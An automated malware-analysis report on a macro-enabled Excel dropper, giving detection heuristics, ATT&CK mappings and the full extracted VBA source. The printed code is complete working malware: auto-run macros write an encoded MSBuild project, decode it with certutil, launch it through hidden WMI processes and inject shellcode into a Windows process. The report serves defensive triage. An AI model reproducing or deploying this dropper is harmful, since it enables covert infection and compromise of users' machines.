MALICIOUS
406
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.005 System Binary Proxy Execution: Msbuild
T1140 Deobfuscate/Decode Files or Information
T1218.009 System Binary Proxy Execution: Regsvr32
The sample is a macro-enabled Excel document containing Auto_Open and Workbook_Open macros, indicating immediate execution upon opening. The VBA script utilizes `CreateObject` and `GetObject` to launch `certutil.exe` and `msbuild.exe` for downloading and executing a second-stage payload from a constructed XML file. It also attempts to establish persistence by creating a Run key entry named 'OfficeUpdate'. The script's obfuscation and use of legitimate system binaries to download and execute further code are characteristic of a dropper.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-7080481-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7080481-0
-
VBA project inside OOXML medium 8 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
cu = "certutil" ex = "exe" -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Public Function GEeROixMEn() As Variant Set fs = CreateObject("Scripting.FileSystemObject") Set TmpFolder = fs.GetSpecialFolder(2) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Public Function GEeROixMEn() As Variant Set fs = CreateObject("Scripting.FileSystemObject") Set TmpFolder = fs.GetSpecialFolder(2) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objS = ObjWS.Get("Win32_ProcessStartup") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() Auto_Open -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() Dim exdate As Date -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Sub ArmySafe() strDomain = Environ("USERDOMAIN") arrDomains = Split("NASW,nasw,NANW,nanw,NAE,nae,NASE,nase,NG,ng,MI,mi,AMED,amed,RSNI,rsni,MHS,mhs,QUIROZ1,quiroz1,PENTEST-01,pentest-01", ",") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15634 bytes |
SHA-256: e90b2c4b7b2d5152ca40d53e0c2262e170e7d3ac8914f71aa2f0685411228e5a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
119 of 188 identifiers look randomly generated (e.g. 'eVJlYWQ9MHgwMDAwMDAxMCxWaXJ0dWFsTWVtb3J5') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Dim fs As Object
Dim TmpFolder As Object
Dim env
Dim cu
Dim ecu As String
Dim emsb As String
Dim ex
Dim msb
Dim officeDir As String
Dim msbPath As String
Dim TmpFile
Dim windir
Dim wmsb As Object
Dim strLocation As String
Sub Auto_Open()
Dim exdate As Date
exdate = "06/22/2018"
If Date < exdate Then
ArmySafe
End If
End Sub
Sub ArmySafe()
strDomain = Environ("USERDOMAIN")
arrDomains = Split("NASW,nasw,NANW,nanw,NAE,nae,NASE,nase,NG,ng,MI,mi,AMED,amed,RSNI,rsni,MHS,mhs,QUIROZ1,quiroz1,PENTEST-01,pentest-01", ",")
If (UBound(Filter(arrDomains, strDomain)) > -1) = True Then
Call GoPwn
End If
End Sub
Sub GoPwn()
Call GEeROixMEn
End Sub
Public Function GEeROixMEn() As Variant
Set fs = CreateObject("Scripting.FileSystemObject")
Set TmpFolder = fs.GetSpecialFolder(2)
cu = "certutil"
ex = "exe"
msb = "msbuild"
env = CStr(Environ("USERPROFILE"))
windir = CStr(Environ("WINDIR"))
officeDir = env & "\AppData\Local\Microsoft\Office\"
msbPath = windir & "\Microsoft.NET\Framework\v4.0.30319\"
strLocation = officeDir & "\DvNqUT.xml"
TmpFile = "\suMXUxtQWFQiXZ.txt"
dPuOigCljRK = "PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQu"
dPuOigCljRK = dPuOigCljRK + "Y29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPjxUYXJnZXQgTmFtZT0iR2VDVHFzRHpRdGtuQVUiPjxD"
dPuOigCljRK = dPuOigCljRK + "bGFzc0V4YW1wbGUgLz48L1RhcmdldD48VXNpbmdUYXNrIFRhc2tOYW1lPSJDbGFzc0V4YW1wbGUiIFRh"
dPuOigCljRK = dPuOigCljRK + "c2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3Nv"
dPuOigCljRK = dPuOigCljRK + "ZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCI+"
dPuOigCljRK = dPuOigCljRK + "PFRhc2s+PFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPjxVc2luZyBOYW1lc3BhY2U9IlN5c3RlbS5S"
dPuOigCljRK = dPuOigCljRK + "ZWZsZWN0aW9uIiAvPjxVc2luZyBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgLz48VXNpbmcg"
dPuOigCljRK = dPuOigCljRK + "TmFtZXNwYWNlPSJTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMiIC8+PENvZGUgVHlwZT0iQ2xh"
dPuOigCljRK = dPuOigCljRK + "c3MiIExhbmd1YWdlPSJjcyI+PCFbQ0RBVEFbdXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5SZWZsZWN0"
dPuOigCljRK = dPuOigCljRK + "aW9uO3VzaW5nIE1pY3Jvc29mdC5DU2hhcnA7dXNpbmcgTWljcm9zb2Z0LkJ1aWxkLkZyYW1ld29yazt1"
dPuOigCljRK = dPuOigCljRK + "c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzO3VzaW5nIFN5c3RlbS5EaWFnbm9zdGljczt1c2lu"
dPuOigCljRK = dPuOigCljRK + "ZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIENsYXNzRXhhbXBsZTpU"
dPuOigCljRK = dPuOigCljRK + "YXNrLElUYXNre3B1YmxpYyBvdmVycmlkZSBib29sIEV4ZWN1dGUoKXtQcm9ncmFtLk1haW4oKTtyZXR1"
dPuOigCljRK = dPuOigCljRK + "cm4gdHJ1ZTt9fXB1YmxpYyBjbGFzcyBQcm9ncmFte3B1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCl7c3Ry"
dPuOigCljRK = dPuOigCljRK + "aW5nIHN0clNoZWxsQ29kZT0iL09pSkFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVWkzSW9EN2RLSmpIL01j"
dPuOigCljRK = dPuOigCljRK + "Q3NQR0Y4QWl3Z3djOE5BY2ZpOEZKWGkxSVFpMEk4QWRDTFFIaUZ3SFJLQWRCUWkwZ1lpMWdnQWRQalBF"
dPuOigCljRK = dPuOigCljRK + "bUxOSXNCMWpIL01jQ3N3YzhOQWNjNDRIWDBBMzM0TzMwa2RlSllpMWdrQWRObWl3eExpMWdjQWRPTEJJ"
dPuOigCljRK = dPuOigCljRK + "c0IwSWxFSkNSYlcyRlpXbEgvNEZoZldvc1M2NFpkYUc1bGRBQm9kMmx1YVZSb1RIY21CLy9WNkFBQUFB"
dPuOigCljRK = dPuOigCljRK + "QXgvMWRYVjFkWGFEcFdlYWYvMWVta0FBQUFXekhKVVZGcUExRlJhUHNnQUFCVFVHaFhpWi9HLzlWUTZZ"
dPuOigCljRK = dPuOigCljRK + "d0FBQUJiTWRKU2FBQXlvSVJTVWxKVFVsQm82MVV1Ty8vVmljYUR3MUJvZ0RNQUFJbmdhZ1JRYWg5V2FI"
dPuOigCljRK = dPuOigCljRK + "Vkdub2IvMVY4eC8xZFhhdjlUVm1ndEJoaDcvOVdGd0ErRXlnRUFBREgvaGZaMEJJbjU2d2xvcXNYaVhm"
dPuOigCljRK = dPuOigCljRK + "L1ZpY0ZvUlNGZU1mL1ZNZjlYYWdkUlZsQm90MWZnQy8vVnZ3QXZBQUE1eDNVSFdGRHBlLy8vL3pILzZa"
dPuOigCljRK = dPuOigCljRK + "RUJBQURweVFFQUFPaHYvLy8vTDFwaU4ya0FTQ3crODdFRERudVlNSi9XdEJRd0VsVGpZNnVrYzNmNXZj"
dPuOigCljRK = dPuOigCljRK + "clk0S1RpQkRFNS9TaW9ZRmlyU2lSZTNsQXZoSEhMY3B5YkZUSHNZZ1lrejdwR2V5amJxU05aUVFvQ2lt"
dPuOigCljRK = dPuOigCljRK + "RVFIZ0JWYzJWeUxVRm5aVzUwT2lCTmIzcHBiR3hoTHpVdU1DQW9ZMjl0Y0dGMGFXSnNaVHNnVFZOSlJT"
dPuOigCljRK = dPuOigCljRK + "QTVMakE3SUZkcGJtUnZkM01nVGxRZ05pNHhPeUJVY21sa1pXNTBMelV1TUNrTkNnQmRIR1loZXIrNHQx"
dPuOigCljRK = dPuOigCljRK + "UmZ2WEV2OEZnS1JwaVZtcCtPUmJuUWZaeW1PTE52aVNzTnBJdkZZR2svMll2c2o2bzVKenN2Vmw5eHdB"
dPuOigCljRK = dPuOigCljRK + "ZjVZRWE5TkcvdmRRYmNqdXpWSi9aeEhXS2ZpZk5McGdNNG1VUm10eGJxanlBa1RndDM0MnF3UTI1Znk4"
dPuOigCljRK = dPuOigCljRK + "UmVOVXFwWk52azJSMCthREM0S2EwVU0yNjN0RVp2S0dhZjRMM0FzK0gxbkRrNHpteFQ2cjRQbktydXUy"
dPuOigCljRK = dPuOigCljRK + "c0RwQkZ3UnBHYWtBMGtVN1p0MTdJZkJhNHZyN3c4OThURUs0dEpPZng0VE5Ed3ovZjlGbE9tVUZlL3Vj"
dPuOigCljRK = dPuOigCljRK + "bmtnRUtpc0t6em9NU2pXU3BVT0Y2cGxBMkx6dGRYRkVaOHRMMTV3YVJpSWtDdFpsd0FhUEMxb2xiLzFX"
dPuOigCljRK = dPuOigCljRK + "cEFhQUFRQUFCb0FBQkFBRmRvV0tSVDVmL1ZrN2tBQUFBQUFkbFJVNG5uVjJnQUlBQUFVMVpvRXBhSjR2"
dPuOigCljRK = dPuOigCljRK + "L1ZoY0IweG9zSEFjT0Z3SFhsV01Qb2lmMy8vekl4TkM0ekxqYzNMalF5QUhJR1czST0iO2J5dGVbXXNo"
dPuOigCljRK = dPuOigCljRK + "ZWxsY29kZT1TeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKHN0clNoZWxsQ29kZSk7c3RyaW5n"
dPuOigCljRK = dPuOigCljRK + "IHByb2Nlc3NwYXRoPUAiQzpcV2luZG93c1xTeXN0ZW0zMlx3c21wcm92aG9zdC5leGUiO1NUQVJUVVBJ"
dPuOigCljRK = dPuOigCljRK + "TkZPIHNpPW5ldyBTVEFSVFVQSU5GTygpO1BST0NFU1NfSU5GT1JNQVRJT04gcGk9bmV3IFBST0NFU1Nf"
dPuOigCljRK = dPuOigCljRK + "SU5GT1JNQVRJT04oKTtib29sIHN1Y2Nlc3M9Q3JlYXRlUHJvY2Vzcyhwcm9jZXNzcGF0aCxudWxsLElu"
dPuOigCljRK = dPuOigCljRK + "dFB0ci5aZXJvLEludFB0ci5aZXJvLGZhbHNlLFByb2Nlc3NDcmVhdGlvbkZsYWdzLkNSRUFURV9TVVNQ"
dPuOigCljRK = dPuOigCljRK + "RU5ERUQsSW50UHRyLlplcm8sbnVsbCxyZWYgc2ksb3V0IHBpKTtJbnRQdHIgcmVzdWx0UHRyPVZpcnR1"
dPuOigCljRK = dPuOigCljRK + "YWxBbGxvY0V4KHBpLmhQcm9jZXNzLEludFB0ci5aZXJvLHNoZWxsY29kZS5MZW5ndGgsTUVNX0NPTU1J"
dPuOigCljRK = dPuOigCljRK + "VCxQQUdFX1JFQURXUklURSk7SW50UHRyIGJ5dGVzV3JpdHRlbj1JbnRQdHIuWmVybztib29sIHJlc3Vs"
dPuOigCljRK = dPuOigCljRK + "dEJvb2w9V3JpdGVQcm9jZXNzTWVtb3J5KHBpLmhQcm9jZXNzLHJlc3VsdFB0cixzaGVsbGNvZGUsc2hl"
dPuOigCljRK = dPuOigCljRK + "bGxjb2RlLkxlbmd0aCxvdXQgYnl0ZXNXcml0dGVuKTtJbnRQdHIgc2h0PU9wZW5UaHJlYWQoVGhyZWFk"
dPuOigCljRK = dPuOigCljRK + "QWNjZXNzLlNFVF9DT05URVhULGZhbHNlLChpbnQpcGkuZHdUaHJlYWRJZCk7dWludCBvbGRQcm90ZWN0"
dPuOigCljRK = dPuOigCljRK + "PTA7cmVzdWx0Qm9vbD1WaXJ0dWFsUHJvdGVjdEV4KHBpLmhQcm9jZXNzLHJlc3VsdFB0cixzaGVsbGNv"
dPuOigCljRK = dPuOigCljRK + "ZGUuTGVuZ3RoLFBBR0VfRVhFQ1VURV9SRUFELG91dCBvbGRQcm90ZWN0KTtJbnRQdHIgcHRyPVF1ZXVl"
dPuOigCljRK = dPuOigCljRK + "VXNlckFQQyhyZXN1bHRQdHIsc2h0LEludFB0ci5aZXJvKTtJbnRQdHIgVGhyZWFkSGFuZGxlPXBpLmhU"
dPuOigCljRK = dPuOigCljRK + "aHJlYWQ7UmVzdW1lVGhyZWFkKFRocmVhZEhhbmRsZSk7fXByaXZhdGUgc3RhdGljIFVJbnQzMiBNRU1f"
dPuOigCljRK = dPuOigCljRK + "Q09NTUlUPTB4MTAwMDtwcml2YXRlIHN0YXRpYyBVSW50MzIgUEFHRV9FWEVDVVRFX1JFQURXUklURT0w"
dPuOigCljRK = dPuOigCljRK + "eDQwO3ByaXZhdGUgc3RhdGljIFVJbnQzMiBQQUdFX1JFQURXUklURT0weDA0O3ByaXZhdGUgc3RhdGlj"
dPuOigCljRK = dPuOigCljRK + "IFVJbnQzMiBQQUdFX0VYRUNVVEVfUkVBRD0weDIwO1tGbGFnc11wdWJsaWMgZW51bSBQcm9jZXNzQWNj"
dPuOigCljRK = dPuOigCljRK + "ZXNzRmxhZ3M6dWludHtBbGw9MHgwMDFGMEZGRixUZXJtaW5hdGU9MHgwMDAwMDAwMSxDcmVhdGVUaHJl"
dPuOigCljRK = dPuOigCljRK + "YWQ9MHgwMDAwMDAwMixWaXJ0dWFsTWVtb3J5T3BlcmF0aW9uPTB4MDAwMDAwMDgsVmlydHVhbE1lbW9y"
dPuOigCljRK = dPuOigCljRK + "eVJlYWQ9MHgwMDAwMDAxMCxWaXJ0dWFsTWVtb3J5V3JpdGU9MHgwMDAwMDAyMCxEdXBsaWNhdGVIYW5k"
dPuOigCljRK = dPuOigCljRK + "bGU9MHgwMDAwMDA0MCxDcmVhdGVQcm9jZXNzPTB4MDAwMDAwMDgwLFNldFF1b3RhPTB4MDAwMDAxMDAs"
dPuOigCljRK = dPuOigCljRK + "U2V0SW5mb3JtYXRpb249MHgwMDAwMDIwMCxRdWVyeUluZm9ybWF0aW9uPTB4MDAwMDA0MDAsUXVlcnlM"
dPuOigCljRK = dPuOigCljRK + "aW1pdGVkSW5mb3JtYXRpb249MHgwMDAwMTAwMCxTeW5jaHJvbml6ZT0weDAwMTAwMDAwfVtGbGFnc11w"
dPuOigCljRK = dPuOigCljRK + "dWJsaWMgZW51bSBQcm9jZXNzQ3JlYXRpb25GbGFnczp1aW50e1pFUk9fRkxBRz0weDAwMDAwMDAwLENS"
dPuOigCljRK = dPuOigCljRK + "RUFURV9CUkVBS0FXQVlfRlJPTV9KT0I9MHgwMTAwMDAwMCxDUkVBVEVfREVGQVVMVF9FUlJPUl9NT0RF"
dPuOigCljRK = dPuOigCljRK + "PTB4MDQwMDAwMDAsQ1JFQVRFX05FV19DT05TT0xFPTB4MDAwMDAwMTAsQ1JFQVRFX05FV19QUk9DRVNT"
dPuOigCljRK = dPuOigCljRK + "X0dST1VQPTB4MDAwMDAyMDAsQ1JFQVRFX05PX1dJTkRPVz0weDA4MDAwMDAwLENSRUFURV9QUk9URUNU"
dPuOigCljRK = dPuOigCljRK + "RURfUFJPQ0VTUz0weDAwMDQwMDAwLENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMPTB4MDIw"
dPuOigCljRK = dPuOigCljRK + "MDAwMDAsQ1JFQVRFX1NFUEFSQVRFX1dPV19WRE09MHgwMDAwMTAwMCxDUkVBVEVfU0hBUkVEX1dPV19W"
dPuOigCljRK = dPuOigCljRK + "RE09MHgwMDAwMTAwMCxDUkVBVEVfU1VTUEVOREVEPTB4MDAwMDAwMDQsQ1JFQVRFX1VOSUNPREVfRU5W"
dPuOigCljRK = dPuOigCljRK + "SVJPTk1FTlQ9MHgwMDAwMDQwMCxERUJVR19PTkxZX1RISVNfUFJPQ0VTUz0weDAwMDAwMDAyLERFQlVH"
dPuOigCljRK = dPuOigCljRK + "X1BST0NFU1M9MHgwMDAwMDAwMSxERVRBQ0hFRF9QUk9DRVNTPTB4MDAwMDAwMDgsRVhURU5ERURfU1RB"
dPuOigCljRK = dPuOigCljRK + "UlRVUElORk9fUFJFU0VOVD0weDAwMDgwMDAwLElOSEVSSVRfUEFSRU5UX0FGRklOSVRZPTB4MDAwMTAw"
dPuOigCljRK = dPuOigCljRK + "MDB9cHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9Oe3B1YmxpYyBJbnRQdHIgaFByb2Nlc3M7"
dPuOigCljRK = dPuOigCljRK + "cHVibGljIEludFB0ciBoVGhyZWFkO3B1YmxpYyB1aW50IGR3UHJvY2Vzc0lkO3B1YmxpYyB1aW50IGR3"
dPuOigCljRK = dPuOigCljRK + "VGhyZWFkSWQ7fXB1YmxpYyBzdHJ1Y3QgU1RBUlRVUElORk97cHVibGljIHVpbnQgY2I7cHVibGljIHN0"
dPuOigCljRK = dPuOigCljRK + "cmluZyBscFJlc2VydmVkO3B1YmxpYyBzdHJpbmcgbHBEZXNrdG9wO3B1YmxpYyBzdHJpbmcgbHBUaXRs"
dPuOigCljRK = dPuOigCljRK + "ZTtwdWJsaWMgdWludCBkd1g7cHVibGljIHVpbnQgZHdZO3B1YmxpYyB1aW50IGR3WFNpemU7cHVibGlj"
dPuOigCljRK = dPuOigCljRK + "IHVpbnQgZHdZU2l6ZTtwdWJsaWMgdWludCBkd1hDb3VudENoYXJzO3B1YmxpYyB1aW50IGR3WUNvdW50"
dPuOigCljRK = dPuOigCljRK + "Q2hhcnM7cHVibGljIHVpbnQgZHdGaWxsQXR0cmlidXRlO3B1YmxpYyB1aW50IGR3RmxhZ3M7cHVibGlj"
dPuOigCljRK = dPuOigCljRK + "IHNob3J0IHdTaG93V2luZG93O3B1YmxpYyBzaG9ydCBjYlJlc2VydmVkMjtwdWJsaWMgSW50UHRyIGxw"
dPuOigCljRK = dPuOigCljRK + "UmVzZXJ2ZWQyO3B1YmxpYyBJbnRQdHIgaFN0ZElucHV0O3B1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDtw"
dPuOigCljRK = dPuOigCljRK + "dWJsaWMgSW50UHRyIGhTdGRFcnJvcjt9W0ZsYWdzXXB1YmxpYyBlbnVtIFRocmVhZEFjY2VzczppbnR7"
dPuOigCljRK = dPuOigCljRK + "VEVSTUlOQVRFPSgweDAwMDEpLFNVU1BFTkRfUkVTVU1FPSgweDAwMDIpLEdFVF9DT05URVhUPSgweDAw"
dPuOigCljRK = dPuOigCljRK + "MDgpLFNFVF9DT05URVhUPSgweDAwMTApLFNFVF9JTkZPUk1BVElPTj0oMHgwMDIwKSxRVUVSWV9JTkZP"
dPuOigCljRK = dPuOigCljRK + "Uk1BVElPTj0oMHgwMDQwKSxTRVRfVEhSRUFEX1RPS0VOPSgweDAwODApLElNUEVSU09OQVRFPSgweDAx"
dPuOigCljRK = dPuOigCljRK + "MDApLERJUkVDVF9JTVBFUlNPTkFUSU9OPSgweDAyMDApfVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIs"
dPuOigCljRK = dPuOigCljRK + "U2V0TGFzdEVycm9yPXRydWUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBPcGVuVGhyZWFkKFRo"
dPuOigCljRK = dPuOigCljRK + "cmVhZEFjY2VzcyBkd0Rlc2lyZWRBY2Nlc3MsYm9vbCBiSW5oZXJpdEhhbmRsZSxpbnQgZHdUaHJlYWRJ"
dPuOigCljRK = dPuOigCljRK + "ZCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1ZSldcHVibGljIHN0YXRp"
dPuOigCljRK = dPuOigCljRK + "YyBleHRlcm4gYm9vbCBXcml0ZVByb2Nlc3NNZW1vcnkoSW50UHRyIGhQcm9jZXNzLEludFB0ciBscEJh"
dPuOigCljRK = dPuOigCljRK + "c2VBZGRyZXNzLGJ5dGVbXWxwQnVmZmVyLGludCBuU2l6ZSxvdXQgSW50UHRyIGxwTnVtYmVyT2ZCeXRl"
dPuOigCljRK = dPuOigCljRK + "c1dyaXR0ZW4pO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIElu"
dPuOigCljRK = dPuOigCljRK + "dFB0ciBRdWV1ZVVzZXJBUEMoSW50UHRyIHBmbkFQQyxJbnRQdHIgaFRocmVhZCxJbnRQdHIgZHdEYXRh"
dPuOigCljRK = dPuOigCljRK + "KTtbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFs"
dPuOigCljRK = dPuOigCljRK + "QWxsb2MoVUludDMyIGxwU3RhcnRBZGRyLEludDMyIHNpemUsVUludDMyIGZsQWxsb2NhdGlvblR5cGUs"
dPuOigCljRK = dPuOigCljRK + "VUludDMyIGZsUHJvdGVjdCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1"
dPuOigCljRK = dPuOigCljRK + "ZSApXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2NFeChJbnRQdHIgaFByb2Nl"
dPuOigCljRK = dPuOigCljRK + "c3MsSW50UHRyIGxwQWRkcmVzcyxJbnQzMiBkd1NpemUsVUludDMyIGZsQWxsb2NhdGlvblR5cGUsVUlu"
dPuOigCljRK = dPuOigCljRK + "dDMyIGZsUHJvdGVjdCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIixTZXRMYXN0RXJyb3I9dHJ1ZSld"
dPuOigCljRK = dPuOigCljRK + "cHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIE9wZW5Qcm9jZXNzKFByb2Nlc3NBY2Nlc3NGbGFncyBw"
dPuOigCljRK = dPuOigCljRK + "cm9jZXNzQWNjZXNzLGJvb2wgYkluaGVyaXRIYW5kbGUsaW50IHByb2Nlc3NJZCApO1tEbGxJbXBvcnQo"
dPuOigCljRK = dPuOigCljRK + "Imtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ3JlYXRlUHJvY2VzcyhzdHJp"
dPuOigCljRK = dPuOigCljRK + "bmcgbHBBcHBsaWNhdGlvbk5hbWUsc3RyaW5nIGxwQ29tbWFuZExpbmUsSW50UHRyIGxwUHJvY2Vzc0F0"
dPuOigCljRK = dPuOigCljRK + "dHJpYnV0ZXMsSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcyxib29sIGJJbmhlcml0SGFuZGxlcyxQcm9j"
dPuOigCljRK = dPuOigCljRK + "ZXNzQ3JlYXRpb25GbGFncyBkd0NyZWF0aW9uRmxhZ3MsSW50UHRyIGxwRW52aXJvbm1lbnQsc3RyaW5n"
dPuOigCljRK = dPuOigCljRK + "IGxwQ3VycmVudERpcmVjdG9yeSxyZWYgU1RBUlRVUElORk8gbHBTdGFydHVwSW5mbyxvdXQgUFJPQ0VT"
dPuOigCljRK = dPuOigCljRK + "U19JTkZPUk1BVElPTiBscFByb2Nlc3NJbmZvcm1hdGlvbik7W0RsbEltcG9ydCgia2VybmVsMzIuZGxs"
dPuOigCljRK = dPuOigCljRK + "IildcHVibGljIHN0YXRpYyBleHRlcm4gdWludCBSZXN1bWVUaHJlYWQoSW50UHRyIGhUaHJlYWQpO1tE"
dPuOigCljRK = dPuOigCljRK + "bGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIHVpbnQgU3VzcGVuZFRo"
dPuOigCljRK = dPuOigCljRK + "cmVhZChJbnRQdHIgaFRocmVhZCk7W0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildcHVibGljIHN0YXRp"
dPuOigCljRK = dPuOigCljRK + "YyBleHRlcm4gYm9vbCBWaXJ0dWFsUHJvdGVjdEV4KEludFB0ciBoUHJvY2VzcyxJbnRQdHIgbHBBZGRy"
dPuOigCljRK = dPuOigCljRK + "ZXNzLGludCBkd1NpemUsdWludCBmbE5ld1Byb3RlY3Qsb3V0IHVpbnQgbHBmbE9sZFByb3RlY3QpO31d"
dPuOigCljRK = dPuOigCljRK + "XT48L0NvZGU+PC9UYXNrPjwvVXNpbmdUYXNrPjwvUHJvamVjdD4="
Set wmsb = fs.CreateTextFile(TmpFolder & TmpFile, True)
wmsb.WriteLine dPuOigCljRK
wmsb.Close
Const HIDDEN_WINDOW = 0
strComputer = "."
ecu = cu & strComputer & ex & " " & "-decode -f" & " " & TmpFolder & TmpFile & " " & strLocation
Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objS = ObjWS.Get("Win32_ProcessStartup")
Set objC = objS.SpawnInstance_
objC.ShowWindow = HIDDEN_WINDOW
Set objP = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objP.Create ecu, Null, objC, intProcessID
emsb = msbPath & msb & strComputer & ex & " " & strLocation
Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objS = ObjWS.Get("Win32_ProcessStartup")
Set objC = objS.SpawnInstance_
objC.ShowWindow = HIDDEN_WINDOW
Set objP = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objP.Create emsb, Null, objC, intProcessID
End Function
Sub Macro2()
ActiveSheet.Shapes.Range(Array("Picture 1")).Select
Selection.ShapeRange.ZOrder msoSendToBack
ActiveSheet.Shapes.Range(Array("Picture 3")).Select
Selection.ShapeRange.ZOrder msoSendToBack
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 39936 bytes |
SHA-256: a0e50844b0401f5a67dc00d60459dfcf7308e0acaeca701360e26ffedc153a54 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-7080481-0
Obfuscation or payload:
likely
414 of 700 identifiers look randomly generated (e.g. 'ZSApXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.